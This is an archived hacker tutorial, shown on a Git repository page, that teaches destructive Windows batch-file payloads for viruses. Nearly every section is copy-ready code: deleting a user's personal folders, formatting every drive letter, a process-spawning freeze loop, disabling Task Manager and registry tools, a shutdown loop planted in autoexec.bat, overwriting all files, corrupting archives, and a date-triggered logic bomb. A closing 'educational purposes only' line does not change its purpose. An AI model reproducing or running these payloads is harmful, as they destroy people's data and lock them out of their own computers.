informis
/
textfiles
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
textfiles/uploads/awesomepayloads.txt

290 lines
14 KiB
Plaintext
Raw Blame History

+ +
TUTORIAL:
AwEsOmE BaTcH PaYlOaDs
by
+ cOrRuPt G3n3t!x +
Welcome to my 6th tutorial, we have discussed many things in my last 5 such as Polymorhism, Spreading,
Satrtup Methods, Anti AV Techniques and even a Theory on Batch Keylogging! Today i would like to discuss
some possible payloads in batch; things such as keyboard disable and mouse disable cannot be used any more
because it does not support vista any more, but read on further i might just have came up with a new technique ;)
I will admit, i'm not really into destructive payloads such as formatting C:\ drives etc i just dont like 'em
but, i will be putting my dislikes aside and show you all great methods i know and/or have seen in practice.
1)Random Directory Maker (RDM):
----------------------------
This will make random folders in the current directory, you can minipulate it by
giving a path before the random part to make it go to a specific path!:
-------------------------------[Cut Here]--------------------------------------
@echo off
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
md %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% %random%
-------------------------------[Cut Here]--------------------------------------
2)User Specific Deletion (USD):
----------------------------
This method will delete the users Documents, Pictures, Videos, Music and Downloads in a Windows Vista System;
It can be changed to do the same for XP:
-------------------------------[Cut Here]--------------------------------------
@echo off
DEL /F /Q %UserProfile%\Documents\*.* >nul
DEL /F /Q %UserProfile%\Pictures\*.* >nul
DEL /F /Q %UserProfile%\Videos\*.* >nul
DEL /F /Q %UserProfile%\Downloads\*.* >nul
DEL /F /Q %UserProfile%\Music\*.* >nul
-------------------------------[Cut Here]--------------------------------------
3)Windows CrAsh/FreEzE:
--------------------
This is the age old method of starting up windows CMD.exe in a loop and slow the computer down to a halt!
all it will do is call up CMD.exe in a loop, my computer never crashed but i could not operate it
and had to reset (if this is considered a virus\payload its the smallest i've ever seen 17bytes to be exact):
-------------------------------[Cut Here]--------------------------------------
:a
start
goto a
-------------------------------[Cut Here]--------------------------------------
4)Formating:
---------
This will delete all data on backup and shared drives, however it will not format the drive running windows!
You can change the system type from NTFS to UDF.. etc just type 'Format /?' in CMD.exe for more info(although
most new HDD's use NTFS):
-------------------------------[Cut Here]--------------------------------------
@echo off
FORMAT A: /FS:NTFS /V:(A:) /X /P:1 /y >nul
FORMAT B: /FS:NTFS /V:(B:) /X /P:1 /y >nul
FORMAT C: /FS:NTFS /V:(C:) /X /P:1 /y >nul
FORMAT Z: /FS:NTFS /V:(Z:) /X /P:1 /y >nul
FORMAT E: /FS:NTFS /V:(E:) /X /P:1 /y >nul
FORMAT F: /FS:NTFS /V:(F:) /X /P:1 /y >nul
FORMAT G: /FS:NTFS /V:(G:) /X /P:1 /y >nul
FORMAT H: /FS:NTFS /V:(H:) /X /P:1 /y >nul
FORMAT I: /FS:NTFS /V:(I:) /X /P:1 /y >nul
FORMAT J: /FS:NTFS /V:(J:) /X /P:1 /y >nul
FORMAT K: /FS:NTFS /V:(L:) /X /P:1 /y >nul
FORMAT M: /FS:NTFS /V:(M:) /X /P:1 /y >nul
FORMAT N: /FS:NTFS /V:(N:) /X /P:1 /y >nul
FORMAT O: /FS:NTFS /V:(O:) /X /P:1 /y >nul
FORMAT P: /FS:NTFS /V:(P:) /X /P:1 /y >nul
FORMAT Q: /FS:NTFS /V:(Q:) /X /P:1 /y >nul
FORMAT R: /FS:NTFS /V:(R:) /X /P:1 /y >nul
FORMAT S: /FS:NTFS /V:(S:) /X /P:1 /y >nul
FORMAT T: /FS:NTFS /V:(T:) /X /P:1 /y >nul
FORMAT U: /FS:NTFS /V:(U:) /X /P:1 /y >nul
FORMAT V: /FS:NTFS /V:(V:) /X /P:1 /y >nul
FORMAT W: /FS:NTFS /V:(W:) /X /P:1 /y >nul
FORMAT X: /FS:NTFS /V:(Y:) /X /P:1 /y >nul
FORMAT Z: /FS:NTFS /V:(Z:) /X /P:1 /y >nul
-------------------------------[Cut Here]--------------------------------------
Next we will look at formating USB's and D: drives Although i will give all the possible locations of the USB
and D drives, it is very unlikely they'll be found anywhere else on other pc's as usually, D: is D and E.F,G and H
are USB, C:, Z: etc are Drives take that into account before just adding all the code to it!!:
-------------------------------[Cut Here]--------------------------------------
format A: /y >nul
format B: /y >nul
format C: /y >nul
format D: /y >nul
format E: /y >nul
format F: /y >nul
format G: /y >nul
format H: /y >nul
format I: /y >nul
format J: /y >nul
format K: /y >nul
format L: /y >nul
format M: /y >nul
format N: /y >nul
format O: /y >nul
format P: /y >nul
format Q: /y >nul
format R: /y >nul
format S: /y >nul
format T: /y >nul
format U: /y >nul
format V: /y >nul
format W: /y >nul
format X: /y >nul
format Y: /y >nul
format Z: /y >nul
-------------------------------[Cut Here]--------------------------------------
It is important to note that it does take a few minutes to format USB's, D: drives etc, so
it woukd be clever to put the formatting at the end of your virus routine, because even
if it just starts formatting and the user cancels it; the disk, drive or USB will still need to be formatted
properly before it can be used. You could also make a sort of logic bomb that will set the computer to format
on a given day and month, see below:
-------------------------------[Cut Here]--------------------------------------
If %date% NEQ 2009/08/14 goto exit
format E: /y >nul
:exit
exit
-------------------------------[Cut Here]--------------------------------------
5)Disable RegisteryTools and Taskmnger.exe:
-----------------------------------------
This is an extremely annoying payload, once activated the user will not be able to acess any Reg tools
such as REGEDIT.exe and this includes others among them CMD.exe and Taskmangr.exe! This also means
no batch, script or .reg program can run!!! So it is important to not activate this until your virus has
done its job; this is perfect for self destructing virii, as it can disable these tools when it deletes itself
from the users system:
-------------------------------[Cut Here]--------------------------------------
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d "1" /f
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistrytools /t reg_dword /d "1" /f
-------------------------------[Cut Here]--------------------------------------
6)Swap Mouse Buttons (SMB):
------------------------
This method was used alot in older Windows, but now with vista it does not work anymore, i have however
found another method via the registery just remember a restart is required to take effect:
-------------------------------[Cut Here]--------------------------------------
REG ADD "HKU\S-1-5-21-3199511022-2964655342-1435898374-1000\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f
-------------------------------[Cut Here]--------------------------------------
I have just figured out after 15 minutes if a reg key has a space in its name such as the above use
quotation marks ( "reg key value" ) ;[!
7)Time & Date Changer:
-------------------
This, as the name suggest, will change the time and date of the computer on every start up:
-------------------------------[Cut Here]--------------------------------------
attrib -r -h C:\autoexec.bat
echo.Time 00:00:00>>C:\autoexec.bat
echo.Date 45/04/11>>C:\autoexec.bat
attrib +r +h C:\autoexec.bat
-------------------------------[Cut Here]--------------------------------------
8)Windows Restart Loop:
--------------------
This will set the users PC in a restart loop. Changing /t 02 to /t 00 will make
an immediate shutdown where as /t 02 will wait 2 seconds before shut down. Type 'shutdown /?'
in CMD.exe for more information:
-------------------------------[Cut Here]--------------------------------------
attrib -r -h C:\autoexec.bat
echo.shutdown -r /t 02 /c "You are infected with a virus!!">>C:\autoexec.bat
attrib +r +h C:\autoexec.bat
-------------------------------[Cut Here]--------------------------------------
9)Internal Clock Overwrite (ICO):
------------------------------
PLEASE DO NOT TEST ON YOUR PC!! I HAVE NOT TESTED ON MINE BUT SHOULD WORK, I WILL NOT BE
RESPONSIBLE FOR ANY USER STUPIDITY!!!!!! and a big thanks to Dvl for this.
This will overwrite your internal dos variable clock$ and will then crash the users computer with
a stack overflow. When PC reboots depending on the bios you are using the bios will be filled with garbage
on other bioses it will only affect the date and time!
There are all sorts of internal variables that you can overwrite with the echo command.
To get a list of these commands type 'mem /d':
-------------------------------[Cut Here]--------------------------------------
Echo 123>clock$
-------------------------------[Cut Here]--------------------------------------
I have also provided a few other ones:
-------------------------------[Cut Here]--------------------------------------
echo 123>CON
echo 123>AUX
echo 123>PRN
echo 123>COM1
echo 123>COM2
echo 123>COM3
echo 123>COM4
-------------------------------[Cut Here]--------------------------------------
10)File Execution:
--------------
This will open up, images, websites, mp3's and anything else you want, just change the name
and location of your specific file(Inspired by Dvl's method):
-------------------------------[Cut Here]--------------------------------------
explorer.exe C:\pic.jpg
explorer.exe C:\Immortal_technique.mp3
explorer.exe http://pornhub.com
-------------------------------[Cut Here]--------------------------------------
11)BAT/Silly.D Virus revamp:
------------------------
We all know this simple dos virus but now i have taken it a step further
it will overwrite all files and make them unusable(another thanx to Dvl:
-------------------------------[Cut Here]--------------------------------------
echo.fUcK tHe SySt3m>>%Temp%\FTS.tmp
for %%a in (*.*) do copy %temp%\FTS.tmp %%a >nul
-------------------------------[Cut Here]--------------------------------------
12)Payload Activation Technique (PAT):
----------------------------------
This will show you how to let your paylaod activate on a certain date or if parameters are met
in the example below it will check if the current date is equal to the date i set if not it
will exit if it is it will run the code:
-------------------------------[Cut Here]--------------------------------------
If %date% NEQ 2009/08/14 goto exit
"Your virus payload here"
:exit
exit
-------------------------------[Cut Here]--------------------------------------
13)File Compression Corruption:
---------------------------
This is my very own technique that gels extremely well with my name (cOrRuPt G3n3t!x)
haha, and now i'ma teach you how to corrupt all types of compressed files
(.zip, .7z, .rar etc) it is extremely simple though as it works on the basis that i copy
an uncompressed file straight into a compressed file, thus windows will not be able to
extract it and it will display a message similiar to 'This file is corrupted':
-------------------------------[Cut Here]--------------------------------------
echo.corrupt compressed files now!!!>>%temp%\cg.tmp
for %%a in (*.zip *.7z *.tar *.rar *gz *.bz2) do set a=%%a
copy %temp%\cg.tmp %a% >nul
del %temp%\cg.tmp
-------------------------------[Cut Here]--------------------------------------
Well you've come to the end of my next tutorial, some techniques i've showed here are kinda new, so have fun
if you have any queries or problems you need help with (I'm talking about batch problems not personal :)) then
drop me some mail! PS. This is for educational purposes only! Do not distrubute with intention to do harm!
Now Batch Up !!!!! ;)
[?]Contact Me:
-----------
[@]immortalassassin@rocketmail.com
Reference in New Issue View Git Blame Copy Permalink